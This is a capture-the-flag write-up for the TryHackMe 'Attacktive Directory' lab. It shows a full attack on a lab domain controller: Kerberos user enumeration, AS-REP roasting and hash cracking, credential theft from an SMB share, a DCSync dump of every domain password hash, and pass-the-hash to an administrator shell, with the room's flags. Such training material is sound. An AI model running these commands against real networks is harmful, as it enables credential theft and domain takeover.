TryHackMe - Attacktive Directory Write-up
https://tryhackme.com/r/room/attacktivedirectory
This write-up will focus on overall solving methodology, and not by-task basis.
Different tools are showcased to perform the same objective.
Enumeration
My target machine IP: 10.10.98.165
Check for domain name and naming contexts
First thing first, nmap scan.
nmap -n -sV --script "ldap* and not brute" 10.10.98.165 -vv -oN nmap.output
We've obtained some naming contexts and domain:
Alternative way to look for naming contexts:
root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=spookysec,DC=local
namingcontexts: CN=Configuration,DC=spookysec,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=spookysec,DC=local
namingcontexts: DC=DomainDnsZones,DC=spookysec,DC=local
namingcontexts: DC=ForestDnsZones,DC=spookysec,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Check NULL bind
Results show that it is unsuccessful.
root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local
# extended LDIF
#
# LDAPv3
# base <DC=spookysec,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
root@ip-10-10-155-73:~#
Shares enumeration
The result shows us that we're not allowed to view the shares anonymously. We'll need to get some credentials in this case.
root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -N
WARNING: The "syslog" option is deprecated
Anonymous login successful
Sharename Type Comment
--------- ---- -------
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.98.165]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup availableUser enumeration
Mini wordlists are provided by author in order to save us some time.
Username wordlist: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Password wordlist: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
The tools that can be used are kerbrute and ldapsearch.
To install Kerbrute:
$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
$ chmod +x kerbrute_linux_amd64
# add to path
$ sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute
# test installation
$ kerbruteUsing the wordlists provided, we can run kerbrute to get some usernames:
root@ip-10-10-155-73:~# kerbrute userenum -d spookysec.local --dc 10.10.98.165 userlist.txt -o valid_users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/22/24 - Ronnie Flathers @ropnop
2024/09/22 06:59:11 > Using KDC(s):
2024/09/22 06:59:11 > 10.10.98.165:88
2024/09/22 06:59:11 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:12 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:12 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:12 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:13 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:13 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:14 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:15 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:18 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:19 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:24 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:36 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:40 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:52 > [+] VALID USERNAME: [email protected]
2024/09/22 06:59:56 > [+] VALID USERNAME: [email protected]
2024/09/22 07:00:03 > [+] VALID USERNAME: [email protected]
2024/09/22 07:00:20 > Done! Tested 73317 usernames (16 valid) in 68.499 secondsSome notable accounts are svc-admin (service admin) and backup.
Alternatively, ldapsearch can be run. But since we were not able to perform NULL bind, hence there will be no results shown with this method.
root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local "(objectClass=person)" | grep "sAMAccountName:"
root@ip-10-10-155-73:~#More information
We can get more info with enum4linux:
enum4linux 10.10.98.165
This tool help us to gather loads of information in an automated and easier manner.
Initial Foothold
Get password hash
Now since we've got some usernames in hand, we can try to perform AS-REP Roasting attack. The tool will first send authentication requests to the user accounts and figure out the ones that doesn't require Kerberos pre-authentication.
If successful, we'll get Kerberos TGT that has the user's password hash embeded. We can then extract the hash and crack it offline.
The hint in earlier tasks told us that svc-admin might be interesting for us, let's parse that value for our tool. Just press "Enter" without inputting any values when password is asked.
root@ip-10-10-155-73:~# GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.98.165 -request
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Cannot authenticate svc-admin, getting its TGT
[email protected]:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563Hooray! Ticket returned alongside with the hash.
I'll put it into a text file called svc-admin.hash.
root@ip-10-10-155-73:~# cat svc-admin.hash
[email protected]:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563Cracking the hash
Here's a useful link to search for what type of hash we obtained: hashcat wiki
The prefix told us that the mode that we need to use is 18200:
Remember the password list provided by the author earlier? We'll use that.
root@ip-10-10-155-73:~# hashcat -m 18200 svc-admin.hash passwordlist.txt
hashcat (v6.1.1-66-g6a419d06) starting...
* Device #2: Outdated POCL OpenCL driver detected!
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 35 MB
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
[email protected]:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:d23bacacc84...6f6563
Time.Started.....: Sun Sep 22 07:32:20 2024 (0 secs)
Time.Estimated...: Sun Sep 22 07:32:20 2024 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 578.5 kH/s (13.26ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> whitey
Started: Sun Sep 22 07:31:59 2024
Stopped: Sun Sep 22 07:32:21 2024
root@ip-10-10-155-73:~# Password for svc-admin is management2005.
Looking into shares
This time, we have a valid credentials to login into the share.
root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -U svc-admin%management2005
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup availableFor easier enumeration in the share, we'll switch to smbmap.
To install: sudo pip3 install smbmap
We've obtained a username called backup earlier, so it makes sense for us to have a look at the backup share first.
root@ip-10-10-155-73:~# smbmap -H 10.10.98.165 -u svc-admin -p management2005 -r backup
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - [email protected]<mailto:[email protected]>
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Authenticating... [*] Established 1 SMB connections(s) and 1 authenticated session(s)
[/] Enumerating shares... [-] Enumerating shares... [\] Enumerating shares... [|] Enumerating shares... [/] Enumerating shares... [-] Enumerating shares...
[+] IP: 10.10.98.165:445 Name: ip-10-10-98-165.eu-west-1.compute.internal Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
./backup
dr--r--r-- 0 Sat Apr 4 20:08:39 2020 .
dr--r--r-- 0 Sat Apr 4 20:08:39 2020 ..
fr--r--r-- 48 Sat Apr 4 20:08:53 2020 backup_credentials.txt
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [\] Closing connections.. [|] Closing connections.. [/] Closing connections.. [-] Closing connections.. [*] Closed 1 connections
root@ip-10-10-155-73:~#
Recursive listing reveals a credential text file.
Login to the share and retrieve the file.
root@ip-10-10-155-73:~# smbclient //10.10.98.165/backup -U svc-admin
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 3664666 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> exit
root@ip-10-10-155-73:~# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwI wasn't quite sure what encoding is used, so I dumped it into cyberchef, and the magic wand appeared.
Upon clicking on the wand, we know that it's a base64 encoding.
Boom! It's the credential for user account backup: [email protected]:backup2517860
Alternative method of decoding base64 hash:
root@ip-10-10-155-73:~# cat backup_credentials.txt | base64 -d
[email protected]:backup2517860Privilege Escalation
Get admin credentials
As mentioned by the author:
A backup account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.
Hmm, this means that we can try dumping all the password hashes that this backup account contains.
root@ip-10-10-155-73:~# secretsdump.py -outputfile secresdump.output -just-dc-ntlm spookysec.local/backup:[email protected]
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:7d4c1da7336435b8961a5840a7de68d7:::
[*] Cleaning up... Ahhh, look what we've gotten, Administrator's hash.
Pass the hash
Now, we can perform pass-the-hash attack with the NTLM hash.
root@ip-10-10-155-73:~# evil-winrm -i 10.10.98.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>Successful login!
Flags
Time to retrieve the flags from each user's Desktop.
Administrator:
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/17/2020 4:04 PM a-spooks
d----- 9/17/2020 4:02 PM Administrator
d----- 4/4/2020 12:19 PM backup
d----- 4/4/2020 1:07 PM backup.THM-AD
d-r--- 4/4/2020 11:19 AM Public
d----- 4/4/2020 12:18 PM svc-admin
*Evil-WinRM* PS C:\Users> ls Administrator/Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 11:39 AM 32 root.txt
*Evil-WinRM* PS C:\Users> cat Administrator/Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
*Evil-WinRM* PS C:\Users> svc-admin:
*Evil-WinRM* PS C:\Users> ls svc-admin/Desktop
Directory: C:\Users\svc-admin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:18 PM 28 user.txt.txt
*Evil-WinRM* PS C:\Users> cat svc-admin/Desktop/user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users> backup:
*Evil-WinRM* PS C:\Users> ls backup/Desktop
Directory: C:\Users\backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/4/2020 12:19 PM 26 PrivEsc.txt
*Evil-WinRM* PS C:\Users> cat backup/Desktop/PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users> That's it, hope you enjoyed :)
Last updated
Was this helpful?